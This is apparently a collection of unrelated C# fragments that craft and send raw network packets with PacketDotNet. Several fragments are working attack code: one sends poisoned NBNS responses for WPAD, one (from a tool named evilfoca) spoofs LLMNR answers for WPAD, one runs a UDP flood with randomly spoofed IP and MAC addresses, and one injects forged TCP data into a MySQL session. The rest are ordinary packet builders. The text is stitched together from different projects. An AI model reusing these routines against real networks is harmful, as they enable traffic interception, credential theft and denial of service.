/// <summary> /// Fires off on a seperate thread when a packet is available /// </summary> /// <param name="sender"></param> /// <param name="e"></param> private void ProcessPacket(RawCapture incoming) { try { Packet packet = Packet.ParsePacket(LinkLayers.Ethernet, incoming.Data); EthernetPacket ethSrc = (EthernetPacket)packet.Extract(typeof(EthernetPacket)); IPv4Packet ipSrc = (IPv4Packet)packet.Extract(typeof(IPv4Packet)); if (ipSrc.Protocol == IPProtocolType.UDP) { UdpPacket udpSrc = (UdpPacket)packet.Extract(typeof(UdpPacket)); // From RFC 1002 Section 4.2.1.1 // Need to grab the transaction id for the reply UInt16 namedTrnId = BitConverter.ToUInt16(udpSrc.PayloadData, 0); // Looking for Response = query(0), OpCode = Query(0) // 11000000 00000000 UInt16 flags = Utility.ReverseUInt16(BitConverter.ToUInt16(udpSrc.PayloadData, 2)); if ((flags & 0xc000) == 0) { // Grab the name and make sure it's WPAD string name = Encoding.Default.GetString(udpSrc.PayloadData, 12, 34); if (Utility.DecodeName(name) == WpadHostName) { Logger.AddToInfoView("Received NBNS query for {0} from {1}", WpadHostName, ethSrc.SourceHwAddress); UdpPacket udpDst = new UdpPacket(NetbiosPort, NetbiosPort); udpDst.PayloadData = SetupResponse(namedTrnId, GetDeviceIp(this.Device)); IPv4Packet ipDst = new IPv4Packet(GetDeviceIp(this.Device), ipSrc.SourceAddress); ipDst.PayloadPacket = udpDst; udpDst.UpdateCalculatedValues(); udpDst.UpdateUDPChecksum(); ipDst.UpdateCalculatedValues(); ipDst.UpdateIPChecksum(); EthernetPacket ethDst = new EthernetPacket(this.Device.MacAddress, ethSrc.SourceHwAddress, EthernetPacketType.IpV4); ethDst.PayloadPacket = ipDst; ethDst.UpdateCalculatedValues(); Logger.AddToInfoView("Sending poisoned response for {0}", WpadHostName); this.Device.SendPacket(ethDst.Bytes); } } } else if (ipSrc.Protocol == IPProtocolType.TCP) { TcpPacket tcpSrc = (TcpPacket)packet.Extract(typeof(TcpPacket)); if (tcpSrc.Syn) { Logger.AddToInfoView("SYN sent {0}:{1}", ipSrc.DestinationAddress, tcpSrc.SourcePort); } } } catch (Exception ex) { Logger.AddToErrorView("OnPacketArrival", ex); } }
/// <summary> /// 使用函数构造UDP数据包 /// </summary> /// <param name="device"></param> /// <param name="dst_mac"></param> /// <param name="dst_ip"></param> /// <param name="src_port"></param> /// <param name="dst_port"></param> /// <param name="send_data"></param> /// <returns></returns> private byte[] GenUDPPacket(PcapDevice device, PhysicalAddress dst_mac, IPAddress dst_ip, int src_port, int dst_port, string send_data) { // 构造UDP部分数据报 UdpPacket udp_pkg = new UdpPacket((ushort)src_port, (ushort)dst_port); udp_pkg.PayloadData = strToToHexByte(send_data); udp_pkg.UpdateCalculatedValues(); // 构造IP部分数据报 IPv4Packet ip_pkg = new IPv4Packet(device.Interface.Addresses[1].Addr.ipAddress, dst_ip); ip_pkg.Protocol = IPProtocolType.UDP; ip_pkg.Version = IpVersion.IPv4; ip_pkg.PayloadData = udp_pkg.Bytes; ip_pkg.TimeToLive = 10; ip_pkg.UpdateCalculatedValues(); ip_pkg.UpdateIPChecksum(); // 构造以太网帧 EthernetPacket net_pkg = new EthernetPacket(device.MacAddress, dst_mac, EthernetPacketType.IpV4); net_pkg.Type = EthernetPacketType.IpV4; net_pkg.PayloadData = ip_pkg.Bytes; net_pkg.UpdateCalculatedValues(); return(net_pkg.Bytes); }
public Packet Build(EthernetPacket packet, UserSession session) { var mSrc = packet.SourceHardwareAddress; var mDst = PhysicalAddress.Parse("00-19-C5-12-C5-C9"); var ipPacket = packet.Extract <IPPacket>(); if (ipPacket == null) { return(null); } var udpPacket = packet.Extract <UdpPacket>(); if (udpPacket == null) { return(null); } var src = IPAddress.Parse("10.253.0.1"); var dst = ipPacket.SourceAddress; var newEthernetPacket = new EthernetPacket(mDst, mSrc, EthernetType.None); var newIpPacket = new IPv4Packet(src, dst); _payload[0x9d] = Convert.ToByte(_memoryContext.UserSession.Count()); var user = _userManager.Users.Where(u => u.Id == session.UserId).FirstOrDefault(); var newUdpPacket = new UdpPacket(udpPacket.DestinationPort, udpPacket.SourcePort); newUdpPacket.PayloadData = InjectName(_payload, $"Welcome {user.UserName}!"); newUdpPacket.UpdateCalculatedValues(); newIpPacket.PayloadPacket = newUdpPacket; newIpPacket.UpdateCalculatedValues(); newIpPacket.UpdateIPChecksum(); newEthernetPacket.PayloadPacket = newIpPacket; //await clients.Client(session.ConnectionId).SendGamePacket(session, newEthernetPacket); byte requestRegion = packet.Bytes[packet.Bytes.Length - 4]; session.Status = String.Format(UserStatus.AT_LOBBY, GetGameVersion(requestRegion)); _memoryContext.UserSession.Update(session); _memoryContext.SaveChangesAsync().Wait(); return(newEthernetPacket); }
public static IPv4Packet CreateIpV4Packet(IPAddress sourceIpAddress, IPAddress destinationIpAddress, TcpPacket payloadPacket) { var result = new IPv4Packet(sourceIpAddress, destinationIpAddress) { PayloadPacket = payloadPacket }; payloadPacket.UpdateTCPChecksum(); result.UpdateIPChecksum(); result.UpdateCalculatedValues(); return(result); }
public void GenerateLLMNRResponse(Packet packet) { try { LLMNR.LLMNRPacket llmnr = new LLMNR.LLMNRPacket(); llmnr.ParsePacket(((UdpPacket)(packet.PayloadPacket.PayloadPacket)).PayloadData); if (llmnr.Query.Name.ToLower().Equals("wpad") && llmnr.Query.Type.Value == LLMNR.DNSType.A) { WinPcapDevice dev = Program.CurrentProject.data.GetDevice(); IPAddress ip = Program.CurrentProject.data.GetIPv4FromDevice(dev); byte[] ipv4Addr = ip.GetAddressBytes(); llmnr.AnswerList.Add(new LLMNR.DNSAnswer() { Class = evilfoca.LLMNR.DNSClass.IN, Name = llmnr.Query.Name, Type = evilfoca.LLMNR.DNSType.A, RData = ipv4Addr, RDLength = (short)ipv4Addr.Length, TTL = 12 }); llmnr.IsResponse = true; EthernetPacket ethDns = new EthernetPacket(dev.MacAddress, ((EthernetPacket)packet).SourceHwAddress, EthernetPacketType.IpV4); IPv4Packet ipv4Dns = new IPv4Packet(ip, ((IPv4Packet)((EthernetPacket)packet).PayloadPacket).SourceAddress); UdpPacket udpDns = new UdpPacket(((UdpPacket)(packet.PayloadPacket.PayloadPacket)).DestinationPort, ((UdpPacket)(packet.PayloadPacket.PayloadPacket)).SourcePort); udpDns.PayloadData = llmnr.BuildPacket(); ipv4Dns.PayloadPacket = udpDns; udpDns.UpdateCalculatedValues(); udpDns.UpdateUDPChecksum(); ipv4Dns.UpdateIPChecksum(); ipv4Dns.UpdateCalculatedValues(); ethDns.PayloadPacket = ipv4Dns; Program.CurrentProject.data.SendPacket(ethDns); } } catch (Exception) { } }
private void processUdpFlood(Object Params) { AttackParams _params = Params as AttackParams; if (_params.UdpFloodEnabled) { NetworkInstruments.IpRandomizer IpSpoofer = new NetworkInstruments.IpRandomizer(); PhysicalAddress TargetMac = NetworkInstruments.ResolveMac(Adapter, _params.Target.Address); ICaptureDevice ActiveDevice = NetworkInstruments.getActiveDevice(Adapter.GetPhysicalAddress()); ActiveDevice.Open(); UdpPacket udpPacket = new UdpPacket(0, 80); IPv4Packet ipPacket = new IPv4Packet(IPAddress.Any, _params.Target.Address); ipPacket.Protocol = IPProtocolType.UDP; ipPacket.PayloadPacket = udpPacket; if (TargetMac == null) { ErrorHandler(1, "Can not get MAC target address"); return; } ; //unable to resolve mac EthernetPacket ethernetPacket = new EthernetPacket(Adapter.GetPhysicalAddress(), TargetMac, EthernetPacketType.None); ethernetPacket.PayloadPacket = ipPacket; while (Attacking) { udpPacket.SourcePort = (ushort)Randomizer.Next(1, 49160); udpPacket.DestinationPort = (ushort)Randomizer.Next(1, 49160); udpPacket.PayloadData = new byte[Randomizer.Next(500)]; Randomizer.NextBytes(udpPacket.PayloadData); udpPacket.UpdateCalculatedValues(); ipPacket.SourceAddress = IpSpoofer.GetNext(ref Randomizer, _params.RestrictedPool); ipPacket.TimeToLive = Randomizer.Next(20, 128); ipPacket.UpdateCalculatedValues(); ipPacket.UpdateIPChecksum(); ethernetPacket.SourceHwAddress = NetworkInstruments.GetRandomMac(ref Randomizer); ethernetPacket.UpdateCalculatedValues(); udpPacket.UpdateUDPChecksum(); ActiveDevice.SendPacket(ethernetPacket); udpCounter++; } } }
/// <summary> /// Create packet that would be replied to by this listener if correctly injected /// </summary> /// <param name="data"></param> /// <returns></returns> public Packet GetReceivablePacket(byte[] data) { var ipBytes = LocalIp.GetAddressBytes(); ipBytes[3]++; var fakeIp = new IPAddress(ipBytes); var fakeMac = PhysicalAddress.Parse("001122334455"); var eth = new EthernetPacket(fakeMac, BroadcastMac, EthernetType.IPv6); var ip = new IPv4Packet(fakeIp, LocalIp); var udp = new UdpPacket(Port, Port); eth.PayloadPacket = ip; ip.PayloadPacket = udp; udp.PayloadData = data; udp.UpdateCalculatedValues(); ip.UpdateCalculatedValues(); udp.UpdateUdpChecksum(); ip.UpdateIPChecksum(); return(eth); }
static void Ns_OnPacket(object sender, IPProtocolType protocolType, EthernetPacket packet) { NetworkSniffer ns = (NetworkSniffer)sender; IPv4Packet ip = (IPv4Packet)packet.PayloadPacket; TcpPacket t = (TcpPacket)ip.PayloadPacket; // Si el paquete recibido es el de respuesta OK del mysql if (t.PayloadData.SequenceEqual(ResponseOk)) { Parent = packet; // Replicamos el paquete, enviando el payload de la fila, si, antes de recibir el SELECT LastSequenceId = (uint)(t.SequenceNumber + t.PayloadData.Length); ip.Id++; t.SequenceNumber = LastSequenceId; t.OptionsCollection.Clear(); t.PayloadData = Payload; t.Ack = true; t.Psh = true; ip.UpdateCalculatedValues(); t.UpdateCalculatedValues(); ip.UpdateIPChecksum(); t.UpdateTCPChecksum(); ns.Send(packet); LastSequenceId = (uint)(t.SequenceNumber + t.PayloadData.Length); Console.WriteLine(t.ToString(StringOutputType.Verbose)); } else { // Si el paquete contiene el valor SELECT string ascii = Encoding.ASCII.GetString(t.PayloadData); if (Parent != null && ascii.Contains("SELECT")) { // Ya no actuamos mas ns.OnPacket -= Ns_OnPacket; ip = (IPv4Packet)Parent.PayloadPacket; t = (TcpPacket)ip.PayloadPacket; // Enviamos un ACK del paquete recibido, para darle por bueno t.SequenceNumber = LastSequenceId; t.AcknowledgmentNumber = t.AcknowledgmentNumber; t.PayloadData = new byte[] { }; ip.Id++; t.Ack = true; t.Psh = false; ip.UpdateCalculatedValues(); t.UpdateCalculatedValues(); ip.UpdateIPChecksum(); t.UpdateTCPChecksum(); ns.Send(packet); Console.WriteLine(t.ToString(StringOutputType.Verbose)); } } }
public static Packet CreatePacket(Param param) { Packet ret = null; //create layer 4 if (param.packetType == Param.PacketType.TCP) { TcpPacket tcpPacket = new TcpPacket(param.sPort, param.dPort); tcpPacket.AllFlags = param.tcpFlag; if (param.dIP.ToString().Contains(".")) { IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP); if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; } ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4); ipPacket.PayloadPacket = tcpPacket; tcpPacket.PayloadData = param.payload; ret.PayloadPacket = ipPacket; ipPacket.UpdateCalculatedValues(); ipPacket.UpdateIPChecksum(); tcpPacket.Checksum = (ushort)tcpPacket.CalculateTCPChecksum(); } else { IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP); ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6); ipPacket.PayloadPacket = tcpPacket; tcpPacket.PayloadData = param.payload; ret.PayloadPacket = ipPacket; } } else if (param.packetType == Param.PacketType.UDP) { UdpPacket udpPacket = new UdpPacket(param.sPort, param.dPort); if (param.dIP.ToString().Contains(".")) { IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP); if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; } ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4); ipPacket.PayloadPacket = udpPacket; udpPacket.PayloadData = param.payload; udpPacket.UpdateUDPChecksum(); ipPacket.PayloadLength = (ushort)(ipPacket.PayloadLength + param.payload.Length); ipPacket.UpdateIPChecksum(); ret.PayloadPacket = ipPacket; } else { IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP); ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6); ipPacket.PayloadPacket = udpPacket; udpPacket.PayloadData = param.payload; udpPacket.UpdateUDPChecksum(); ipPacket.PayloadLength = (ushort)(ipPacket.PayloadLength + param.payload.Length); ret.PayloadPacket = ipPacket; } } else if (param.packetType == Param.PacketType.ICMP) { ICMPv4Packet icmpPacket = new ICMPv4Packet(new ByteArraySegment(new byte[32])); if (param.type != 0 && param.code != 0) { icmpPacket.TypeCode = (ICMPv4TypeCodes)((param.type * 256) + (param.code)); } else if (param.type != 0) { icmpPacket.TypeCode = (ICMPv4TypeCodes)((param.type * 256)); } else { icmpPacket.TypeCode = ICMPv4TypeCodes.EchoRequest; } IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP); if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; } ipPacket.PayloadPacket = icmpPacket; ipPacket.Checksum = ipPacket.CalculateIPChecksum(); ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4); ret.PayloadPacket = ipPacket; } else if (param.packetType == Param.PacketType.ICMPv6) { ICMPv6Packet icmpv6Packet = CreateICMPv6Packet(param); IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP); ipPacket.PayloadPacket = icmpv6Packet; ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6); ret.PayloadPacket = ipPacket; } else if (param.packetType == Param.PacketType.IP) { if (param.dIP.ToString().Contains(".")) { ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4); IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP); if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; } ipPacket.Protocol = param.IPProtocol; ipPacket.PayloadData = param.payload; ipPacket.UpdateCalculatedValues(); ret.PayloadPacket = ipPacket; ipPacket.UpdateIPChecksum(); } else { ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6); //if extension headers were not specified, just put the payload if (param.ExtentionHeader.Count == 0) { IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP); ipPacket.Protocol = param.IPProtocol; ipPacket.PayloadData = param.payload; ipPacket.PayloadLength = (ushort)param.payload.Length; ipPacket.UpdateCalculatedValues(); ret.PayloadPacket = ipPacket; } else { ret = PacketFactory.CreateEHPacket(param, (EthernetPacket)ret); } ret.UpdateCalculatedValues(); } } else if (param.packetType == Param.PacketType.EtherType) { ret = new EthernetPacket(param.sMAC, param.dMAC, param.EtherTypeProtocol); byte[] etherBuffer = (new byte[64]); var payload = new byte[etherBuffer.Length + (param.payload).Length]; etherBuffer.CopyTo(payload, 0); (param.payload).CopyTo(payload, etherBuffer.Length); ret.PayloadData = payload; ret.UpdateCalculatedValues(); } return ret; }